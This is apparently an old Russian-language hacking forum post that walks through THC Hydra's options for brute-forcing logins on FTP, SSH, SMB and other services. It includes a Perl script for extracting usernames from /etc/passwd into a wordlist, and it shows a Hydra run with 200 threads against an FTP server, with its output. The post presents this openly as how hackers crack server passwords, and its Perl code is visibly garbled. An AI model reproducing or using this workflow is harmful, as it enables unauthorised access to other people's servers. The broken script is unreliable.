...ъХ...,гидра аси уже давно не брутит((
Вот всё что нашел на винте.
Итак параметры :
-R -- востановить предыдущую/отменённую сессию.
-S -- подклучаться с помощью ssl.
-l -- логин к которому будет подбираться пароль(или -L список логинов причем к каждому логину из этого списка будет пробуваться только тот пароль который стаит на той же по номеру строчке в файле паролей , что и логин).
-p -- пароль так же как к логину можно подбирать логины к паролю(или -P лист паролей).
-e -- образовательные проверки, попробывать логин без пароля или попробовать пароль такой же как логин.
-С -- формат файла login

ass без указания -L и -P.
-M -- список серверов для парралельной атаки.
-o -- записывать удачные попытки перебора в файл.
-t -- количество одновременных подключений к серверу по дефолту 16.
-w -- определяет максимальное время ожидания (в секундах) для ответов (по дефолту 30).
-v/-V -- расширеный режим, показывает login+pass для каждой попытки.
--||server||-- -- имя атакуемого сервера или можно использовать вместо его опцию -M.
--||service||-- -- сервисе для атаки. Возможные вареанты : [telnet ftp pop3 imap smb smbnt http https http-proxy cisco cisco-enable ldap mssql mysql nntp vnc socks5 rexec snmp cvs icq pcnfs sapr3 ssh2 smtp-auth]
--||OPT||-- -- для некоторых сервисов нужны специальные данные (смотреть README).
Итак всё что нам нужно это нормальный парсер чтобы можно было делать листы login

ass из /etc/passwd или просто login доставал из /etc/passwd. Вот он :
-++++++++++++++++++++++++++++++++++++++++++++--
#!/usr/bin/perl
$in=$ARGV[0];
$out=$ARGV[1];
exit print "Use $0 $in $out;n" unless ($out);
open(IN, "$in");
open(OUT, $out");
while(#;IN) {
chomp;
if(~/sh$/) {
($u, @undef) = split ":";
print OUT "$u#n";
}
}
close(IN);
close(OUT);
-+++++++++++++++++++++++++++++++++++++++++++--
После этого можно преступать к активным действиям :
sh-2.05#./hydra -L /tmp/login.txt -P /tmp/pass.txt -t 200 (в зависимости от скорости хоста)
www.target.com ftp
Hydra v4.5 (c) 2004 by van Hauser / THC - use allowed only for legal purposes.
Hydra (
http://www.thc.org) starting at 2005-02-06 19:26:52
[DATA] 2 tasks, 1 servers, 85 login tries (l:1/p:85), ~42 tries per task
[DATA] attacking service ftp on port 21
[STATUS] attack finished for
www.target.com (waiting for childs to finish)
[21][ftp] host: 84.252.136.7 login: password:
Hydra (
http://www.thc.org) finished at 2005-02-06 19:31:58
Вот с помощью таких инструментов бравые хакеры подбирают пароли к серверам